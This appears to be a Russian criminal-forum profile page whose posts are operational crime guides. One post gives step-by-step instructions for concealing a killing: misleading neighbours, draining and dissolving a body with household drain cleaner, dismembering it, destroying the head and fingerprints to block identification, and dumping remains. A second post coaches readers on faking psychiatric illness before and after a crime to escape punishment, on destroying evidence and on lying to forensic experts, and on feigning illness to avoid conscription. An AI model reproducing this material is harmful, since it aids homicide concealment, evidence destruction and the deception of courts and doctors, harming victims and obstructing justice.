10
10
10
1
1
10
10

Nemisid

Комбинатор
  • Публикации

    368
  • Зарегистрирован

  • Посещение

  • Дней в лидерах

    12
  • Time Online

    8d 9h 43m 36s

Последний раз Nemisid выиграл 15 мая 2017

Публикации Nemisid были самыми популярными!

О Nemisid

  • Звание
    Заслуженный тренер

Информация

  • Пол
    Женщина
  • Депозит
    50 000 рублей

Контакты

Посетители профиля

1 774 просмотра профиля
  1. очень полезное обучение и успешно работаю
  2. Ахтунг! Настоящая информация является всего-лишь своеобразным творчеством, не имеющим никакого отношения к реальной жизни и преступлениям. Авторы не несут ответственности за неверное истолкование данного материала. Сегодня мы поговорим об избавлении от трупа. Не спрашивайте почему я это пишу и зачем это нужно, сами знаете, жизнь штука непредсказуемая. Теоретически, эта статья может пригодиться любому или не пригодиться никому. Просто представьте ситуацию, у вас образовался труп, который сделали вы. И не важно, каким дерьмом был этот человек, правоохранительные органы это не волнует абсолютно... Именно поэтому я собрал из разных источников этот мануал. Способ № 1 Труп у вас в квартире, избавиться от него не составит труда, но займёт достаточно много времени, но не более 2-х суток. Всё зависит от способа. Прежде рассмотрим обстоятельства, при которых это произошло. 1) Если покойный перед смертью прокричал: «Убивают!» - то ваши соседи уже вызвали патрульную машину. Успокойтесь, у вас есть 5 минут, чтобы что-то придумать, например, вариант самообороны; если прямого отношения к квартире вы не имеете – уходите, забрав все свои персонифицированные вещи и, желательно, закрыв на ключ дверь… 2) Если жертва крикнула не более одной гласной буквы, то это будет истолковано соседями неоднозначно. Можете обратиться к предыдущему пункту. Можете добавить нот, крикните: «Давай, давай…, го-о-ол!», или разбейте пару тарелок с криком: «Люда, прекрати…» Или свой вариант. Выключите свет, зашторьте окна, сидите тихо. Даже если правоохранители постучат в дверь, дома просто никого нет; ломать дверь без уверенности в факте преступления или без криков о помощи с обратной стороны, не станут. 3) Всё сделано тихо – похвально. Итак, труп готов. Кровь растекается вокруг трупа, из шейных артерий течёт быстро и брызжет, из ран туловища вытекает равномерно, но также не медленно. Ваша задача как можно скорее перетащить труп в ванну для меньшего залития кровью. Чтоб меньше запачкаться и просто легче, 60-100кг тянут за ворот или ноги и уже у ванны поднимают и перекидывают. Внимание к сантехнике – ремонтировать её возможности не будет. Но также следует обратить внимание на свой костюм, после перетаскивания весь он будет испачкан. Поэтому можно быстро скинуть штаны и кофту, разуться. Это займёт полминуты, много воды, а точнее крови, не утечёт. Труп в ванне. Одна треть дела сделана. Время обдумать ситуацию, а возможно, выждать полчаса тишины. Нужно, чтобы из трупа стекла кровь. Для этого режем артерии: шея, локтевой и коленный сгибы, соединение ноги с тазом. Чтобы избежать разбрызгивания, эти части должны быть направлены вниз или прекрыты одеждой. Пока идёт кровосток, возьмите ведро и тряпку и помойте полы от крови, чтобы она грязью не разносилась ногами, осмотрите стены и мебель. Теперь непосредственно способы. 1) Растворение. В домашних условиях у нас из растворителей могут быть только хозяйственные средства. Это средства для чистки труб: Тирет-Турбо, Тирет-Профессионал и тому подобное для чистки труб; для отбеливания эмали ванн. Эти средства стоят на одной полке, ценовой диапазон 70-200 рублей за 0,5 литра. От средства зависит скорость и качество расщепления, думаю, экономить не стоит. Возьмём 10 литров. Разбавлять водой можно, но не более 50-75%. На инструкциях некоторых средств не советуют смешивать разные средства, но, думаю, какие-то можно разбавлять теми, что подешевле. Но важно, чтобы в составе не было слова щёлочь. В идеале растворятся даже кости, останется небольшая субстанция с мяч. Чтобы сэкономить на растворителе, нужно уменьшить объём реагируемого вещества. Т.е. можно ножом снять одежду с трупа, а бросить обратно после растворения трупа. Можно вспороть брюхо и залить средство внутрь, органы можно вырезать, измельчить и смыть в унитаз. Допускается отделение конечностей с целью компактного расположения их на дне ванны. Пробка в ванне должна быть с цепочкой, но вполне можно обойтись перчатками до локтя. Время растворения минимум 18 часов. Покупать средства лучше в сетевых магазинах, на кассе нужно попросить чек обязательно или пробить в отдельный чек от других товаров, например, еды. Чеки нужны для отчёта перед бухгалтерией, ведь покупаете вы не для себя лично. Переносить в закрытой сумке, можно в несколько походов. Пытливый правоохранитель знает, зачем может быть нужен растворитель. В интернете есть заметка, что средства разъедят трубы и выдадут вас. Это неправда. Кислота реагирует с материей, создаёт новые связи и частично нейтрализуется. Оставшуюся кислотную среду легко нейтрализовать. Это показатель pH: представьте линейку, её концы – щелочная и кислотная среды, посередине нейтральная среда. Кислота нейтрализует щёлочь, щелочь – кислоту. Тогда для создания относительно нейтральной среды нужно добавить щёлочи. Киньте 3 куска хозяйственного мыла и оставьте на час, чтоб побыстрее – посыпьте из коробочки пищевой соды и перемешайте. Наполните ванну водой по локоть перчатки и вытащите пробку. Концентрация уменьшиться. Пусть струя воды бьёт в саму сточную дырку. После соберите, что осталось , в пакет. Вечером, прогуливаясь, выкиньте в реку, канаву или на свалке у гаражей. Кровь на одежде иногда можно вывести, это зависит от материала. Вымазанную одежду следует растворить, сжечь или бросить в лесу, слегка присыпав землёй. Есть упоминания о использовании серной кислоты. Но это отступление от темы, ведь в обычных домашних условиях её нет и достать её негде. Пишут, что её действие преувеличено. Серная кислота – есть серная кислота. Думаю, растворение с ней происходит примерно в 2 раза быстрее. После завершения обратите внимание на эмаль ванны, возможно, её придётся подкрасить. 2) Расчленение. Производится с целью незаметного выноса трупа по частям без привлечения внимания. Ничего ненормального или тяжкого здесь нет. Для отделения конечностей и головы можно обойтись обычным ножом: разрезают ткани, разрывают сухожилия, частично повреждают хрящи, а оголённый сустав упором ноги и при создании плеча разламывается в обратную сторону. Возможно выделение крови. Для разделения цельной кости ножом разрезают ткань до кости, затем используют ножовку по металлу, запаситесь запасной на случай поломки, пилить можно также самим полотном но это раз 5 дольше. Части помещают в полиэтиленовые мешки достаточной прочности, заворачивают, чтобы не было крововыделений. Мешки кладут в туристическую прямоугольную сумку или куда вам удобнее. 1)Сумку кладут в багажник автомобиля и вывозят в лес. Риск заключается в неожиданной проверке багажника сотрудниками ДПС. 2)Есть скутеры, у которых в ногах легко помещается крупная сумка, на небольшом можно разместить на коленях. На скутере следует въехать в лесопарк или пригородный лес, неожиданно съехав с автодороги. 3)Если с транспортом совсем туго в данный момент, то можно вывезти пешком. Делается в светлое время дня, так меньше подозрений. Не следует долго тянуть её вдоль проезжей части, только дворами. Если парк далеко, следует воспользоваться автобусом или электричкой. Входить в лес с крупной сумкой – есть подозрительно. Это делается при отсутствии проезжающих машин. Лопата транспортируется отдельно, желательно, отдельно от черенка. Яма копается заранее или уже на месте, так же можно расширить имеющуюся рытвину. Закапывать лучше в сумке, чтобы кости не были заметны впоследствии. В сумке транспортировать труп и без расчленения. Но, попробуйте сами залезть в сумку, сумка должна быть побольше и, возможно, будет мешать голова… Чтобы положить труп в форме зародыша, нужно уложить в нужное положение сразу, т.к. после окоченения он будет малоподвижен. Если труп найдут, то идентифицировать его по одежде смогут только в небольшом городе. Но с высокой вероятностью его найдут из списка пропавших по голове (по лицу или черепу), отсутствие головы сведёт идентификацию смерти, случившуюся в данном районе, к нулю. При отсутствующей голове ваша жертва останется в списке без вести пропавших в неизвестном месте. Оставлять в любом виде останки трупа в точке сбора мусора нельзя: - бомжи ищут одежду и еду; - чурки-дворники ищут полезные хоз.вещи; - иногда организовано видеонаблюдение мусорки или панорамное – всего двора; - существует утилизация и разбор мусора; - мусорная машина, высыпая из бака мусор, переворачивает всё содержимое. Существуют экзотические способы избавления от трупа. Если вы живёте один, можно забить морозилку конечностями и потихоньку кормить мясом своего пса. Можно даже завести нескольких породистых собачек на размножение, их содержание обойдётся вам бесплатно. Другими словами, наличие трупа – это отличный повод обзавестись породистыми собачками, а наличие породистых собачек – отличный повод обзавестись трупом… Вахахах, это шутка. Вместо собачек можно купить рыбок – они успокаивают, пираний, например. 3) Сжигание. Весьма эффективный способ избавления от трупа и улик. Но для этого нужна печь, поэтому применим только на даче или загородном доме. Сжечь тело своего врага применимо по религиозным причинам. Зороастрийцы в своём учении привязывают душу к плоти (мягким тканям), язычники считают, что душа человека может находиться на земле минимум, пока полностью не разложиться земное тело, вредить и даже переродиться в детях, если захоронено недалеко от родового поселения. Труп также расчленяется и потихоньку сжигается вместе с дровами и иным горючим, можно подлить на конечность бензин. 4) Также можно рассмотреть такой способ как «Оставил и убежал». Жизнь полицейского офицера полна приятных вещей. Высокое жалование, работа нерасторопная, большие откаты и условные льготы, защита государством, знание, где безопасно, патронаж преступников; власть и гибкий закон; дружба со всеми, секс в т.ч. с малолетками. Труп не совсем вписывается в эту идиллию. Поэтому следует оставлять больше таких подарков. Оставлять на улице в незамысловатых позах, выкидывать с этажа, топить в реке. В 90-е, начале 00-х, когда трупов было каждый день по десятку в каждом городе…, в речных городах, когда поутру всплывал труп, полицейские тыкали его палкой, чтобы он пристал к противоположному берегу, а значит, расследовался другим участком полиции. После этого у вас есть 5 минут, чтобы уйти незамеченным. Не забывайте о камерах и возможных встречных свидетелях, а после позаботьтесь о новой жизни. Способ № 2 Исходные — есть тихий труп дома, свежий, визита милиции через час — не ожидается. Задача — без палева утилизировать труп. Едешь в какой-нибудь магазин типа «ОБИ» или «Leroy Merlin», покупаешь там (если есть свое — покупать не надо): 20 метров толстого полиэтилена электромясорубку пару больших пластиковых ведер мешки для мусора стретч-пленку канистру бензина много бумажных полотенец широкую доску (подкладывать под инструмент) большие кусачки ножовку по дереву и запасные полотна к ней пару-тройку хороших ножей-бокскаттеров, рублей по триста молоток широкую стамеску рабочие перчатки рассаду в горшках где-нибудь остановиться и набрать камней, битых кирпичей и т. п. тяжестей. Примерно 3000 рублей на все, может даже меньше. Все купленное придется выбросить, так что переплачивать за бренды смысла нет. Везешь все это домой. Раздеваешься до трусов — все, что на тебе все равно придется выбросить, вымажешься по любому. Место в квартире — рядом с сортиром, хорошо освещенное. Застилаешь полиэтиленом место и сортир, все, кроме унитаза, чтоб ни капли крови мимо. На место — слой полиэтилена, на него — слой ненужной ветоши, чтоб впитывала, если что, на нее — еще несколько слоев полиэтилена. Из ветоши нужно сделать валики по контуру тела, чтобы получилось углубление. Открыть в доме окна, открыть все краны, положить тело в углубление на спину. Надеть перчатки, выпить стопарь. Тело раздеть — одежду срезать, в мешок. Сделать разрез от горла до паха, стамеской и молотком отделить ребра от грудины, раскрыть. вырезать органокомплекс, в ведро, на перемалывание и в унитаз. Поднять у тела руки и ноги, слить кровь в полость, продавить руками чтоб вытекло как можно больше. Вычерпать стаканом — в ведро и в унитаз. Дальше — разделывать. Отпилить голову, (позвоночник удобно рубить стамеской). Срезать все, что можно срезать — в мясорубку и унитаз. Распилить череп — снять все, что снимается, и в ванну, на промывку. Затем все остальное. Мелкие кости типа фаланг пальцев (ребра частично) можно рубить стамеской и тоже спускать в унитаз, остальные зачищать ножом и класть в ванну. В итоге останется скелет без кистей рук и ступней. Пилить конечности не по суставу. Кости отмыть, высушить, с камнями и бумажными полотенцами уложить в мешки для мусора, замотать стретч-пленкой. Разложить в новые пакеты из супермаркета, чтоб выглядело, как покупки. В последний сложить все, что использовалось Получится четыре-пять пакетов. Зачистить все дома. Отмыться. Сжечь какие-нибудь продукты на сковороде, чтоб воняло, сковороду не мыть. Отнести пакеты в машину, сверху украсить рассадой. Уехать «на дачу». В идеале — рядом должна сидеть твоя бабушка, но и одному нормально, если с рассадой. Не менее 50 километров от города, покидать кости в 4-5 разных водоемов, если есть болотистые — вообще идеально. Пакет с инструментом и полиэтиленом — сжечь. Машину — в химчистку. Самому — в церковь, свечку усопшему поставить, и домой, бухать, отдыхать, снимать стресс, играть в дэнди, теребить колбаску. Некоторые дополнения к предыдущим способам: 1.Подготовить себя к процессу расчленения можно обнажившись, либо надеть плотный костюм из полиэтилена; 2. Подготовить комнаты (расстелить полиэтилен на полу, устранить все вещи, которые вы хотите впоследствии сохранить); 3. Провести по окончанию влажную уборку с дезинфецирующим средством; 4. При вскрытии брюшины важно - ни в коем случае не повредить желудочно-кишечный тракт! Надрез необходимо производить по фасциям; 5. Отделение кишечника и устранение его из организма делать аккуратно, отделяя от соединений и брыжеек, ни в коем случае не повреждая его целостности; кишечник устраняем вместе с желудком и пищеводом/ в случае если пищевод не вытягивается из грудины, его следует туго перетянуть и обрезать. 6. Чтобы вскрыть грудную клетку понадобится ножовка, либо большой нож; 7. При отделении конечностей от тела нет необходимости в топоре или пиле, достаточно большого и острого ножа; очищаем область сустава от соединительной и мышечной ткани, рассекаем капсулу сустава; конечности отделяются поэтапно в каждом суставе по частям; 8. При отделении головы от тела очищаем позвоночник от тканей, рассекаем соединительную ткань между 2-мя позвонками, ножа также достаточно; 9. При свежевании конечностей кожа и мышцы отделяются от костей и размещаются отдельно для дальнейшего удобства утилизации; 10. Существуют 2 способа утилизации головы (голова - самый опасный и трудноутилизируемый предмет): поэтапное удаление скальпа, глазных яблок, распил черепа ножовкой, извлечение мозга, очистка черепа от тканей/ либо вываривание содержимого головы; необходимо в данном случае будет еще и избавиться от бульона; 11. Необходимо уничтожить особые приметы (кожу пальцев, кожу с татуировками); 12. Утилизация кишечника и желудка проблем не вызывает, т.к. человеческие внутренности почти ничем не отличаются от свиной требухи; 13. Утилизация кожи, органов и тканей: сжигание, растворение, закапывание. Каждый способ имеет свои недостатки. Ни один из способов не подлежит выполнению в домашних условиях; 14. Утилизация костей - измельчение в костную муку; - кости предварительно вывариваются; - кости утилизуются при помощи ступки и пестика; при отсутствии таковых используются молоток и металлическая поверхность; - процесс шумный; - в первую очередь зубы и череп; Проявив некоторую сноровку не логическое мышление вы без особого труда сможете полностью избавится от тела, но это не значит что все улики против вас уничтожены. Остается оперативная работа, свидетели, загрязнение ковров пола и стен биоматериалами, которые удалить полностью крайне сложно.
  3. Судебная медицина Судебная медицина — это особая, упорядоченная система научных знаний, на базисе которой решаются вопросы медицинского характера, возникающие в процессе судопроизводства и деятельности правоохранительных органов. В статье пойдет речь о том, как использовать знания судебной медицины для фальсификации доказательств, успешной симуляции или сокрытия следов преступления. Целью данных действий не всегда является осознанное запланированное преступление – в жизни случаются ситуации, когда просто нельзя поступить иначе, дело уже совершено и необходимо найти выход. Практическая значимость статьи выражается в следующем - возможности полностью или частично избежать наказания за совершенное преступление путем подготовки самого себя, времени, места преступления, симуляции и диссимуляции определенного расстройства, разбора потенциальных возможностей и поиска юридических лазеек. Пример практического использования: симуляция психического расстройства в уголовном судопроизводстве может переквалифицировать наказания с лишения свободы до принудительного лечения в стационаре тюремного типа, до принудительного лечения в общем стационаре, до добровольного лечения в дневном стационаре либо просто снизить срок заключения. В практике встречается снижения срока наказания до 1/3 от максимального срока заключения. В статье будут рассмотрены следующие области судебной медицины: уголовное судопроизводство с привлечением судебно-медицинского эксперта уголовное судопроизводство с привлечением судебно-психиатрического эксперта судебно-медицинская экспертиза живых лиц судебно-медицинская экспертиза трупа судебно-психиатрическая экспертиза живых лиц судебно-психиатрическая экспертиза лиц, совершивших преступление судебно-психиатрическая экспертиза лиц, подлежащих призыву на военную службу Уголовный кодекс УК РФ, Статья 21. Невменяемость Суть - если вы были невменяемы в момент совершения преступления - вы будете освобождены от наказания. Принудительное лечение будет назначено лишь в том случае, если ваше болезненное состояние декомпенсировано - т. е. продолжается и усугубляется. Если же вы находитесь в стадии компенсации своего заболевания - лечение назначено не будет. Главное, что необходимо запомнить - невменяемость должна быть обусловлена только психическим расстройством и только в определенным временной промежуток. Полная невменяемость не является предметом этой статьи. Психическое расстройство, повлекшее за собой состояние невменяемости, не зависит от воли и желания больного. Самостоятельно это расстройство не определяет вменяемость больного - ее определяет лишь тяжесть расстройства во время совершения преступления, при котором больной не осознавал характер своих действий, приведших к преступлению. УК РФ, Статья 22. Уголовная ответственность лиц с психическим расстройством, не исключающим вменяемости Сюда относятся все пограничные состояния - невротические и психотические в стадии компенсации нарушения психики, которые могут влиять на способность к осознанию своих действий и руководству ими – аффект, опьянение, сильное эмоциональное напряжение и другие, не относятся к обстоятельствам, обусловливающим невменяемость. На практике наличие данного заключения снижает срок. УК РФ, Статья 23. Уголовная ответственность лиц, совершивших преступление в состоянии опьянения Опьянение на практике почти всегда идет как отягчающее обстоятельство. Заключение о совершении преступления в состоянии алкогольного опьянения как правило прибавляет срок. УК РФ, Статья 61. Обстоятельства, смягчающие наказание Все просто - больше пунктов наберется - меньше будет срок наказания. УК РФ, Статья 62. Назначение наказания при наличии смягчающих обстоятельств На практике наличие заболевания скидывает до 1/3 срока. Если приплюсовать с раскаянием и особым порядком судопроизводства - вполне реально добиться 1/3 от максимального срока или изменения типа наказания на более мягкий. УК РФ, Статья 63. Обстоятельства, отягчающие наказание Противоположность предыдущему пункту. По количественному весу имеют "большую стоимость", доводя срок наказания до максимально предусмотренного. УК РФ, Статья 72.1. Назначение наказания лицу, признанному больным наркоманией На практике это амбулаторное посещение нарколога с экспресс-тестами мочи. Начиная с ежедневного посещения и заканчивая полугодовым. УК РФ, Статья 81. Освобождение от наказания в связи с болезнью На практике принудительное лечение назначается в подавляющем большинстве случаев. При таком исходе не следует торопится с "выздоровлением" - если от срока наказания не прошло 2/3 то вас скорее всего отправят досиживать срок, чего легко можно избежать. УК РФ, Статья 82.1. Отсрочка отбывания наказания больным наркоманией На практике это выглядит как двухлетний контроль у нарколога по месту жительства. При таком исходе дела важно не совершать преступлений в период лечения и не пропускать явки. После стойкой ремисии наказанием будет отменено. УК РФ, Статья 97. Основания применения принудительных мер медицинского характера Если ты не выглядишь как конченный - все ограничится недолгим пребыванием с последующей выпиской на амбулаторное посещение. Важный момент статьи - что принудительное лечение может быть назначено даже с легкими формами заболевания. УК РФ, Статья 98. Цели применения принудительных мер медицинского характера Мотив статьи - не стоит ускорять свое выздоровление. УК РФ, Статья 99. Виды принудительных мер медицинского характера Чаще всего принудительные меры либо радикальные - нахождение в спецлечебнице/стационаре на весь срок, либо мягкие - амбулаторное наблюдение. Все зависит от обстоятельств дела. УК РФ, Статья 100. Принудительное наблюдение и лечение у врача-психиатра в амбулаторных условиях Правила благополучия при этом виде лечения - не пропускать прием и быть корректным с врачом. УК РФ, Статья 101. Принудительное лечение в медицинской организации, оказывающей психиатрическую помощь в стационарных условиях Почти что тюремное положение, разве что наблюдение другого рода. Готовится к сложному положению и строгому режиму отделения. С персоналом не обострять отношения не при каком роде - от этого зависит срок твоего пребывания. Не верь, не бойся, не проси + молчи и выполняй. УК РФ, Статья 102. Продление, изменение и прекращение применения принудительных мер медицинского характера На практике после 6 месяцев принудительного лечения вас переведут на амбулаторное наблюдение. УК РФ, Статья 103. Зачет времени применения принудительных мер медицинского характера Все просто. Лечился год = отсидел год. УК РФ, Статья 104. Принудительные меры медицинского характера, соединенные с исполнением наказания Аналогично предыдущему. УК РФ, Статья 107. Убийство, совершенное в состоянии аффекта Запомните главное! Патологический аффект не может наступить в состоянии полного психического здоровья. Если вы решили добавится переквалификации статьи, то озаботиться и о наличии заболевания. В ином случае аффект могут признать физиологическим, что относится к состояниям, не исключающим вменяемость. Уголовно-процессуальный кодекс УПК РФ, Статья 57. Эксперт Эксперт не будет выносить вам приговор. Он лишь выскажет свое профессиональное мнение о ситуации, на основании которой правоохранительные органы произведут судопроизводство. Надеется на плохого эксперта - глупо. Даже самый тупой эксперт будет умнее хорошего врача, а это уже показатель. Эксперту лишней информации - не давать, все сугубо по легенде, помните что эксперт напрямую сотрудничает с правоохранительными органами. УПК РФ, Статья 80. Заключение и показания эксперта и специалиста Если вам будет предложено рассказать что-либо "не для протокола" - не верить. Держатся легенды. УПК РФ, Статья 178. Осмотр трупа. Эксгумация На практике редкость - но при наличии на то показаний эксгумацию проведут быстро и без проволочек. УПК РФ, Статья 179. Освидетельствование Комментарии излишни. УПК РФ, Статья 180. Протоколы осмотра и освидетельствования Мотив - уничтожать все предметы, связанные с преступлением, даже если связь для вас не очевидна. Никаких выбрасываний и тайных нычек. Огонь - лучший способ уничтожить улику. УПК РФ, Статья 195. Порядок назначения судебной экспертизы На практике отказ от экспертизы вызывает подозрения и лишние телодвижения. УПК РФ, Статья 196. Обязательное назначение судебной экспертизы Отказ от первого пункта возможен при достоверных обстоятельствам, указывающих на естественную смерть. Помни об этом! УПК РФ, Статья 203. Помещение в медицинскую организацию, оказывающую медицинскую помощь в стационарных условиях, или в медицинскую организацию, оказывающую психиатрическую помощь в стационарных условиях, для производства судебной экспертизы Обычный срок такой экспертизы - 30 дней. УПК РФ, Статья 204. Заключение эксперта Без комментариев. УПК РФ, Статья 433. Основания для производства о применении принудительных мер медицинского характера В иных случаях назначить вам принудительное лечение - нельзя! УПК РФ, Статья 434. Обстоятельства, подлежащие доказыванию Очень хорошо, если у вас есть факторы, играющие на руку - выписки из стационаров, где вы проходили лечение, рецепты на лекарственные средства etc. УПК РФ, Статья 435. Помещение в медицинскую организацию, оказывающую психиатрическую помощь в стационарных условиях Без комментариев. УПК РФ, Статья 436. Выделение уголовного дела Помните об этом моменте. Иносказательно - никогда не поздно быть психически нездоровым. УПК РФ, Статья 437. Участие лица, в отношении которого ведется производство о применении принудительной меры медицинского характера, и его законного представителя На практике в стационар к вам никто не придет и никого не пустят, кроме следователя/дознавателя. С адвокатом решайте вопросы заранее, или будет поздно. УПК РФ, Статья 438. Участие защитника Без комментария. Судебно-психиатрический раздел С кем придется встречаться и какие обследования проходить: психиатрический эксперт (главное лицо, окончательное решение за ним) психолог-эксперт (главное вспомогательное лицо, на его заключение будет формироваться заключение врача) нарколог (длительный визит для статей 228, краткий для остальных) врач-специалист (по узкой специальности) невролог (обязателен в СПЭ для дифференцировки) терапевт и хирург (обязателен в СПЭ для соматической оценки) следователь и дознаватель (посредник и связной с правохранением) СПЭ 1 уровня амбулаторный прием СПЭ 2 уровня стационар общего типа либо экспертное отделение СПЭ 3 уровня закрытый режим Этапы СПЭ: 1) клиническая беседа и осмотр 2) при недостаточности повторный прием 3) при недостаточности стационарная экспертиза (от 30 до 90 дней) в стационаре: общемедицинское обследование, консультация смежных специалистов, функциональные и инструментальные обследования (анализы биожидкостей, ЭКГ/ЭЭГ, РЭГ, ЭхоЭГ, краниорентгенограмма, МСКТ) 4) психологическое и патопсихологическое тестирование (проективные методики, изучение патологии мышления, восприятия, памяти, интеллекта, способности к праксису и гнозису, сапозаполняемые опросники, специфические тесты) 5) динамическое наблюдение 6) при недостаточности экспертиза в закрытом учреждении Исходом СПЭ является: признание лица невменяемым признание лица ограниченно вменяемым признание лица вменяемым признание лица больным каким-либо заболеванием с верификацией обстоятельств дела оценка уровня трудоспособности и дефекта жизни оценка опасности для общества, самого себя, способность к самообслуживанию После исхода с признанием болезни, вне критериев вменяемости - может быть назначено принудительное лечение. Подробнее остановимся, как в сегодняшней практике назначается принудительное лечение: Первый фактор - это общественно опасное деяние. Трактуется это так - лицу с признанным психическим заболеванием, находящемуся под наблюдением, но совершившему неопасное преступление - назначать принудительное лечение нецелесообразно. Лицу же, субъективно здоровому, но совершившему в состоянии невменяемости опасное преступление - принудительное лечение необходимо. Второй фактор - связь характера болезни и мотива преступления. Трактовать можно так - если пациент в силу психического расстройства совершил преступление ввиду аффективной нестабильности (приобрел марихуану с целью улучшения депрессивного состояния) - то причин для принудительно лечения нет. Если же пациент сделал то же самое под влияние императивного галлюциноза (голос приказал ему это сделать, а вместо травки пациент видел синий бутылек маны) - показания для лечения самые прямые. Третий фактор - временной. Если психическое расстройство, наступившее (и у пострадавшего и употерпевшего) после совершения преступления является неизлечимым - то это прямое показание к принудительному лечению. Если психическое расстройство, наступившее (и у пострадавшего и у потерпевшего) после совершения преступления является временным - показаний к лечению в стационаре нет. Отдельно отмечу момент о судопроизводстве, в котором необходимо выяснять, нуждается ли пациент в лечении от наркомании. На практике принудительные меры либо опускают, либо назначают без срока окончания. Отменить лечение может только суд. Общие правила симуляции 1) Симуляцию стоит начинать до совершения преступления. 2) Симуляцию стоит продумать заранее - прочесть литература по интересующей нозологии и проконсультироваться со специалистом. 3) Видимые признаки симуляции должны подтвердить изолированно несколько человек - родственники, друзья, следователь, участковый врач. 4) Симулировать начинаем с момента первого же контакта с правоохранительными органами, не забывая о своей роли. 5) Симуляцию не стоит перегружать - она должна быть смазанной и в одном ключе. 6) Помни о том, что за тобой постоянно наблюдают. 7) Быть спокоен и уверен в себе, докажи самому себе наличие у тебя этого заболевания. Комментарии к правилам 1) Разумеется, если у вас это в планах. Допустим, вы кардер, и несмотря на все средства соблюдения анонимности - по сути ходите под статьей. Выбираем время и идем в ПНД к участковому психиатру. Жалуемся на *** психопатию, депрессивный эпизод ***, проходим лечение амбулаторно или в дневном стационаре. Таким образом, мы убиваем множество зайцев: участковый психиатр будет вам верить априори, ибо вы пришли за помощью сами, без социального влияния с другой стороны (вы не просите справок на работу или в академию, не нуждаетесь в подтверждении какого-либо диагноза для военкомата или полиции - вы самый обыкновенный больной человек, которому требуется помощь) при судебном процессе мы будем иметь запись в ПНД о проходимом там лечении, что даст почву для опоры дальнейшей симуляции ознакомитесь с больницей и структурой отделения 2) Часто в литературе описаны лишь проявления, и плохой симулянт "не добирает", либо "перебирает" с симптоматикой и путается в своих же показаниях. 3) Пусть твои родственники будут в курсе, что ты "там чем то болел" и наблюдался у психиатра. 4) Не нужно с порога кричать следователю о наличии у тебя заболевания - важна линия поведения, характерная для твоей патологии. Сказать ему об этом ты должен лишь в ответ на вопрос, находишься ли ты на диспансерном наблюдении у психиатра. 5) Не нужно придумывать что-то свое, пусть это будет дважды безумное и ебанутое - это ошибка. 6) Смысл этого правила в том, что больной с шизоидным расстройством на вопрос что делаешь в свободно время ответит "читаю книги, смотрю в окно, рисую картины", а не "чатюсь с пацанами, пью пиво, комедии посматриваю, хуле мне еще делать то". Поведение нужно продумать с учетом твоего расстройства. 7) Если ты перестанешь переживать спалят тебя или нет, а будешь думать о факте наличия у тебя этого заболевания - ты случайно не выдашь себя. Словарик Симуляция - это сознательное введение окружающих в заблуждение изображением признаков заведомо не существующего заболевания. Диссимуляция - это сознательное введение окружающих в заблуждение скрыванием своего заболевания. Аггравация - это сознательное преувеличение симптомов действительно имеющегося заболевания, что является главным отличием от симуляции. Дезаггравация - это сознательное преуменьшение симптомов действительно имеющегося заболевания, что является главным отличием от диссимуляции. Заметьте, что в последних трех случаях человек действительно болен. На чем можно проколотся, не соблюдая правила Если ты начал симуляции на моментах: заключения под стражу, на судебном заседании, переходе судопроизводства - это признак твоей лжи. Нельзя симулировать в переломные моменты! Если сразу симуляцию начать не удалось - делай это постепенно и всегда. Что делать не стоит никогда! Это преувеличивать количество, качество и длительность симптомов. При этом нарушении тебя запишут в подлые агграванты и выкинут на мороз. Какие виды симуляции нам доступны Симуляции до совершения преступления - легко будет подтвердить, имея запись в ПНД. Симуляции в момент совершения - можно провести как следствие своей болезни и либо уйти от ответственности в виду невменяемого состояния, либо в ввиду возникновения патологического аффекта. Симуляция после преступления - самое неудачное, однако имеет место быть Критерии Обстоятельства сперва непостоянны, затем постоянны - ошибка! Нужна целостность. Обстоятельства укладываются в отдельные симптомы/синдромы, а не в клинику заболевания - ошибка! Косить нужно по нозологии. Вся клиника в психиатрии условно делится на позитивные симптомы и негативные. Позитивных (в "плюс") в норме быть не должно. Негативных (в "минус") нет, а в норме они должны быть. Пример первых - бредовые идеи, галлюцинации. Пример вторых - упадок настроения, эмоциональная холодность. Разберем конкретный пример При симуляции галлюцинаций к вам могут быть применены средства, при нормальном течении болезни индуцирующие патологию восприятия. Индукция производится путем суггестивной просьбы (вид психиатрического внушения), будьте внимательны! Все, что вы "видите и слышите" нужно запомнить и повторить врачу без ошибок по его просьбе через некоторое время. Допускается ответ "не очень помню". 1) Если врач дает вам телефонную трубку либо обьект, похожий на нее и просит вас сказать, что именно говорит вам голос в трубке - необходимо подробно воспроизвести темб, манеру, высоту голоса, содержание беседы, ее тип и вид. Пример: "Голос приказывает лечь в постель и не двигаться, женский, говорит медленно, тихо, приходится прислушиваться, интонации уговаривающие, иногда с нотками приказа." 2) Если врач говорит о чем-либо с одновременным надавливанием на глазные яблоки - необходимо представить, что перед вашим взором возник образ того, о чем говорил врач. Пример: "Вспышки света". 3) Если врач рассказывает вам о каком-либо предмете, а затем дает его вам с одновременным воздействием на тело (сжимает руки, ноги, грудь) - необходимо воспроизвести ощущение от этого предмета. Пример: "Холодный и колючий предмет." 4) Если врач показывает чистый лист и просит рассказать, что вы на нем видите - вам необходимо тщательно описать придуманную сцену и запомнить ее. Если вопрос ставится в другое форме, к примеру "Как вам нравится этот дом на листе?" либо "Не правда ли красивый фиолетовый оттенок?" - необходимо представить то, что сказал врач и дополнить своей фантазией. Подобного рода тесты доступны для всех видом патологии - мышление, память, интеллект, воля, восприятие. Еще немного поговорим о военной экспертизе. Заключение психиатра о годности службе соответствует следующему: А - годен Б - незначительно ограниченно годен В - ограниченно годен Г - временно не годен Д - не годен Разница будет зависеть от течения заболевания, самого заболевания, стадии заболевания и периода комиссации. Графа "Г" часто дает отсрочку по медпоказаниям, графа "Б" и "В" способствует получения военного билета если нет недобора, графа "Д" абсолютна противопоказывает службу в армии. Какие медицинские статьи ставит психиатр в военкомате: Статья 14 - Органические расстройства (болезни Альцгеймера, Нимана-Пика, Паркинсона и прочие) Статья 15 - Эндогенные психозы (шизофрения, биполярное расстройство и другие) Статья 16 - Экзогенные расстройства (при повреждениях головного мозга и прочие) Статья 17 - Невротические расстройства (связанные со стрессом и прочие) Статья 18 - Расстройства личности (психопатии и другое) Статья 19 - Расстройства, связанные с употребление ПАВ (в т. ч. наркомании) Статья 20 - Умственная отсталость Статья 21 - Эпилепсия (в т. ч. эпилептоидная психопатия) Откосить по статье 14, 20, 21 без ее наличия - невозможно, забываем о них. Косить по наркомании - последнее дело, забываем. Косить по 16 статье проблематично, если нет повреждения соматики и неврологического дефекта - забываем. Остаются статьи 15, 17 и 18. Это золотое дно для косящего по психушке. Симулировать эти расстройства не составит труда. Конечно же, шизофрению симулировать нельзя, удобнее всего подбираться через шизоидное расстройство 